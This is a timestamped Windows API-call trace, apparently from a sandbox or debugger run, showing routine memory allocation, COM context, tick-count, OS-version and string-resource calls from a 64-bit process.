	[0068.820] ??2@YAPEAX_K@Z () returned 0x4c7ea0
	[0068.820] ??2@YAPEAX_K@Z () returned 0x4c7ed0
	[0068.820] ??2@YAPEAX_K@Z () returned 0x4c7f00
	[0068.821] ??2@YAPEAX_K@Z () returned 0x4c7f00
	[0068.821] ??2@YAPEAX_K@Z () returned 0x4c7f30
	[0068.821] ??2@YAPEAX_K@Z () returned 0x4c7f60
	[0068.822] ??2@YAPEAX_K@Z () returned 0x4c7f60
	[0068.822] ??2@YAPEAX_K@Z () returned 0x4cab80
	[0068.822] ??2@YAPEAX_K@Z () returned 0x4cabb0
	[0068.823] ??2@YAPEAX_K@Z () returned 0x4cabb0
	[0068.823] ??2@YAPEAX_K@Z () returned 0x4cabe0
	[0068.823] ??2@YAPEAX_K@Z () returned 0x4cac10
	[0068.824] ??2@YAPEAX_K@Z () returned 0x4cac10
	[0068.824] ??2@YAPEAX_K@Z () returned 0x4cac40
	[0068.824] ??2@YAPEAX_K@Z () returned 0x4cac70
	[0068.825] ??2@YAPEAX_K@Z () returned 0x4cac70
	[0068.825] ??2@YAPEAX_K@Z () returned 0x4caca0
	[0069.145] ??2@YAPEAX_K@Z () returned 0x4cacd0
	[0069.145] ??2@YAPEAX_K@Z () returned 0x4cacd0
	[0069.146] ??2@YAPEAX_K@Z () returned 0x4cad00
	[0069.146] ??2@YAPEAX_K@Z () returned 0x4cad30
	[0069.146] ??2@YAPEAX_K@Z () returned 0x4cad30
	[0069.147] ??2@YAPEAX_K@Z () returned 0x4cad60
	[0069.147] ??2@YAPEAX_K@Z () returned 0x4cad90
	[0069.148] ??2@YAPEAX_K@Z () returned 0x4cad90
	[0069.149] ??2@YAPEAX_K@Z () returned 0x4cadc0
	[0069.151] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.152] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0069.152] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.152] GetTickCount () returned 0x220c8
	[0069.154] realloc (_Block=0x0, _Size=0xc8) returned 0x4c19e0
	[0069.279] ??2@YAPEAX_K@Z () returned 0x4d3be0
	[0069.280] ??2@YAPEAX_K@Z () returned 0x4c2fd0
	[0069.280] malloc (_Size=0x80) returned 0x4c0b20
	[0069.280] malloc (_Size=0x108) returned 0x2b8930
	[0069.282] ??2@YAPEAX_K@Z () returned 0x500a20
	[0069.283] realloc (_Block=0x0, _Size=0x64) returned 0x4c23c0
	[0069.283] realloc (_Block=0x0, _Size=0x27c) returned 0x4ccae0
	[0069.284] free (_Block=0x4c23c0) 
	[0069.284] ??2@YAPEAX_K@Z () returned 0x4d4d60
	[0069.285] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0069.286] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.286] ??3@YAXPEAX@Z () returned 0x1
	[0069.286] ??3@YAXPEAX@Z () returned 0x1900050001
	[0069.312] ??3@YAXPEAX@Z () returned 0x3400200001
	[0069.313] free (_Block=0x4cffc0) 
	[0069.313] free (_Block=0x4c5540) 
	[0069.313] free (_Block=0x4d13d0) 
	[0069.313] free (_Block=0x4cebb0) 
	[0069.314] free (_Block=0x4cd790) 
	[0069.314] free (_Block=0x4ccd70) 
	[0069.314] free (_Block=0x4cc850) 
	[0069.314] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.314] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.314] ??3@YAXPEAX@Z () returned 0x59000b0001
	[0069.314] free (_Block=0x501530) 
	[0069.315] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.315] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0069.315] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.315] GetTickCount () returned 0x22164
	[0069.316] ??2@YAPEAX_K@Z () returned 0x4cba60
	[0069.316] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.317] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0069.317] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.317] GetTickCount () returned 0x22164
	[0069.317] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.318] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0069.318] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.318] GetTickCount () returned 0x22164
	[0069.321] ??2@YAPEAX_K@Z () returned 0x4d3830
	[0069.322] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.323] realloc (_Block=0x0, _Size=0x64) returned 0x4c23c0
	[0069.323] realloc (_Block=0x0, _Size=0xc8) returned 0x502700
	[0069.323] free (_Block=0x4c23c0) 
	[0069.324] ??2@YAPEAX_K@Z () returned 0x4d9b00
	[0069.327] ??2@YAPEAX_K@Z () returned 0x4da750
	[0069.328] ??2@YAPEAX_K@Z () returned 0x502700
	[0069.329] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.330] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0069.330] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.330] GetTickCount () returned 0x22174
	[0069.331] malloc (_Size=0x208) returned 0x502cf0
	[0069.332] ??2@YAPEAX_K@Z () returned 0x4d47d0
	[0069.333] ??2@YAPEAX_K@Z () returned 0x500a20
	[0069.338] ??2@YAPEAX_K@Z () returned 0x4da9f0
	[0069.339] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.340] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0069.340] ??3@YAXPEAX@Z () returned 0x1
	[0069.340] ??3@YAXPEAX@Z () returned 0x2000530001
	[0069.340] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0069.340] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.340] GetTickCount () returned 0x22184
	[0069.341] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.342] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0069.342] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.342] GetTickCount () returned 0x22184
	[0069.342] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.342] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0069.343] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.343] GetTickCount () returned 0x22184
	[0069.344] ??2@YAPEAX_K@Z () returned 0x4d2df0
	[0069.345] ??2@YAPEAX_K@Z () returned 0x500a20
	[0069.394] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.394] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0069.394] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.394] GetTickCount () returned 0x221b2
	[0069.396] ??2@YAPEAX_K@Z () returned 0x4c5b40
	[0069.397] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.398] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.398] ??3@YAXPEAX@Z () returned 0x1300620001
	[0069.398] ??3@YAXPEAX@Z () returned 0x14005f0001
	[0069.399] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0069.399] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.399] GetTickCount () returned 0x221b2
	[0069.399] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.400] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0069.400] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.400] GetTickCount () returned 0x221b2
	[0069.401] ??2@YAPEAX_K@Z () returned 0x4c6f90
	[0069.402] ??2@YAPEAX_K@Z () returned 0x500a20
	[0069.403] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.404] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0069.404] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.404] GetTickCount () returned 0x221c2
	[0069.405] ??2@YAPEAX_K@Z () returned 0x4d4b90
	[0069.406] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.409] ??2@YAPEAX_K@Z () returned 0x4da900
	[0069.410] ??2@YAPEAX_K@Z () returned 0x502700
	[0069.411] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.411] ??3@YAXPEAX@Z () returned 0x1
	[0069.411] ??3@YAXPEAX@Z () returned 0x4900020001
	[0069.412] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0069.412] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.412] GetTickCount () returned 0x221c2
	[0069.413] malloc (_Size=0x408) returned 0x4e2c80
	[0069.413] realloc (_Block=0x0, _Size=0xa0) returned 0x4c3080
	[0069.413] ??2@YAPEAX_K@Z () returned 0x4daa80
	[0069.414] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.415] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.416] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0069.416] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.416] GetTickCount () returned 0x221d2
	[0069.418] ??2@YAPEAX_K@Z () returned 0x4cc0b0
	[0069.419] ??2@YAPEAX_K@Z () returned 0x500a20
	[0069.420] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.420] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0069.420] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.420] GetTickCount () returned 0x221d2
	[0069.422] ??2@YAPEAX_K@Z () returned 0x4cb940
	[0069.423] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.425] ??2@YAPEAX_K@Z () returned 0x4d30c0
	[0069.426] ??2@YAPEAX_K@Z () returned 0x502700
	[0069.427] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.427] ??3@YAXPEAX@Z () returned 0x1
	[0069.428] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0069.428] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.428] GetTickCount () returned 0x221d2
	[0069.511] ??2@YAPEAX_K@Z () returned 0x4d48f0
	[0069.512] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.514] ??2@YAPEAX_K@Z () returned 0x4cbb20
	[0069.514] GetVersionExA (in: lpVersionInformation=0x22c790*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x2b12f0, dwBuildNumber=0x0, dwPlatformId=0x3ce198, szCSDVersion="") | out: lpVersionInformation=0x22c790*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0069.514] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x1207f8
	[0069.515] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x121d44
	[0069.515] LockResource (hResData=0x121d44) returned 0x121d44
	[0069.515] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x15c
	[0069.515] FreeResource (hResData=0x121d44) returned 0
	[0069.516] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0069.516] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0069.516] LockResource (hResData=0x121c74) returned 0x121c74
	[0069.516] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0069.516] FreeResource (hResData=0x121c74) returned 0
	[0069.516] bsearch (_Key=0x22d128, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0069.516] ??2@YAPEAX_K@Z () returned 0x500a20
	[0069.518] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.519] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.520] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0069.520] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.520] GetTickCount () returned 0x2222f
	[0069.522] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.524] ??2@YAPEAX_K@Z () returned 0x4d81c0
	[0069.525] ??2@YAPEAX_K@Z () returned 0x4c1ff0
	[0069.527] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0069.527] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0069.527] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.527] GetTickCount () returned 0x2222f
	[0069.528] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.529] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0069.529] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.529] GetTickCount () returned 0x2223f
	[0069.530] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.530] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0069.530] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.530] GetTickCount () returned 0x2223f
	[0069.531] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.532] ??2@YAPEAX_K@Z () returned 0x5353a0
	[0069.533] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.536] ??2@YAPEAX_K@Z () returned 0x54a410
	[0069.537] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.537] GetTickCount () returned 0x2223f
	[0069.537] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.539] realloc (_Block=0x4c3080, _Size=0x140) returned 0x4d31a0
	[0069.540] ??2@YAPEAX_K@Z () returned 0x4cbe50
	[0069.541] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.541] GetTickCount () returned 0x2223f
	[0069.541] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.544] ??2@YAPEAX_K@Z () returned 0x4ebaa0
	[0069.545] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.545] GetTickCount () returned 0x2223f
	[0069.545] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.561] free (_Block=0x532fd0) 
	[0069.561] free (_Block=0x535810) 
	[0069.561] free (_Block=0x4e6a10) 
	[0069.561] free (_Block=0x513000) 
	[0069.561] free (_Block=0x503000) 
	[0069.561] free (_Block=0x4dacb0) 
	[0069.561] free (_Block=0x4ce9d0) 
	[0069.561] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.561] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.564] ??2@YAPEAX_K@Z () returned 0x4ebce0
	[0069.565] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.567] ??2@YAPEAX_K@Z () returned 0x4cceb0
	[0069.568] ??2@YAPEAX_K@Z () returned 0x4c1ff0
	[0069.568] GetTickCount () returned 0x2225e
	[0069.568] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.568] free (_Block=0x532fd0) 
	[0069.568] free (_Block=0x535810) 
	[0069.568] free (_Block=0x4e6a10) 
	[0069.568] free (_Block=0x513000) 
	[0069.568] free (_Block=0x503000) 
	[0069.568] free (_Block=0x4dacb0) 
	[0069.568] free (_Block=0x4ce9d0) 
	[0069.568] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.569] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.570] malloc (_Size=0x808) returned 0x4d76e0
	[0069.571] ??2@YAPEAX_K@Z () returned 0x4cd180
	[0069.572] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.574] ??2@YAPEAX_K@Z () returned 0x4ec1c0
	[0069.575] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.577] ??2@YAPEAX_K@Z () returned 0x4e5aa0
	[0069.578] ??2@YAPEAX_K@Z () returned 0x4d32f0
	[0069.578] GetTickCount () returned 0x2226e
	[0069.579] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.581] ??2@YAPEAX_K@Z () returned 0x549900
	[0069.582] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.584] ??2@YAPEAX_K@Z () returned 0x54a140
	[0069.585] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.587] ??2@YAPEAX_K@Z () returned 0x4ec280
	[0069.588] ??2@YAPEAX_K@Z () returned 0x4c1ff0
	[0069.588] GetTickCount () returned 0x2226e
	[0069.588] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.588] free (_Block=0x532fd0) 
	[0069.588] free (_Block=0x535810) 
	[0069.588] free (_Block=0x4e6a10) 
	[0069.588] free (_Block=0x513000) 
	[0069.588] free (_Block=0x503000) 
	[0069.588] free (_Block=0x4dacb0) 
	[0069.589] free (_Block=0x4ce9d0) 
	[0069.589] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.589] ??3@YAXPEAX@Z () returned 0x64fac301
	[0069.591] ??2@YAPEAX_K@Z () returned 0x4cbee0
	[0069.592] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.593] GetTickCount () returned 0x2226e
	[0069.593] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.594] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.595] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0069.595] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.595] GetTickCount () returned 0x2227d
	[0069.595] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.638] ??2@YAPEAX_K@Z () returned 0x54d710
	[0069.639] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.642] ??2@YAPEAX_K@Z () returned 0x54ddd0
	[0069.643] ??2@YAPEAX_K@Z () returned 0x4c1ff0
	[0069.644] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229498 | out: ppv=0x229498*=0x3cf420) returned 0x0
	[0069.645] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0069.645] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.645] GetTickCount () returned 0x222ac
	[0069.646] ??2@YAPEAX_K@Z () returned 0x553a50
	[0069.647] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.650] ??2@YAPEAX_K@Z () returned 0x554650
	[0069.651] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.653] ??2@YAPEAX_K@Z () returned 0x4c23c0
	[0069.654] ??2@YAPEAX_K@Z () returned 0x4d32f0
	[0069.656] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0069.656] ??3@YAXPEAX@Z () returned 0x1
	[0069.656] ??3@YAXPEAX@Z () returned 0x3d00980001
	[0069.658] ??2@YAPEAX_K@Z () returned 0x4c11a0
	[0069.662] ??2@YAPEAX_K@Z () returned 0x4e3110
	[0069.666] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0069.668] MulDiv (nNumber=941, nNumerator=100, nDenominator=3335) returned 28
	[0069.668] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.668] GetTickCount () returned 0x222bc
	[0069.669] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x225978 | out: ppv=0x225978*=0x3cf420) returned 0x0
	[0069.669] ??3@YAXPEAX@Z () returned 0x1
	[0069.669] ??3@YAXPEAX@Z () returned 0x17c00350001
	[0069.679] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x227708 | out: ppv=0x227708*=0x3cf420) returned 0x0
	[0069.680] MulDiv (nNumber=985, nNumerator=100, nDenominator=3412) returned 29
	[0069.680] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.680] GetTickCount () returned 0x222cb
	[0069.682] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x225978 | out: ppv=0x225978*=0x3cf420) returned 0x0
	[0069.682] ??3@YAXPEAX@Z () returned 0x1
	[0069.682] ??3@YAXPEAX@Z () returned 0x2b4003b0001
	[0069.684] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x225978 | out: ppv=0x225978*=0x3cf420) returned 0x0
	[0069.685] MulDiv (nNumber=997, nNumerator=100, nDenominator=3476) returned 29
	[0069.685] IUnknown:Release (This=0x3cf420) returned 0x1
	[0069.685] GetTickCount () returned 0x222cb
	[0069.687] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x21fd88 | out: ppv=0x21fd88*=0x3cf420) returned 0x0
	[0069.687] ??3@YAXPEAX@Z () returned 0x24002f0001
	[0069.687] ??3@YAXPEAX@Z () returned 0x25000b0001
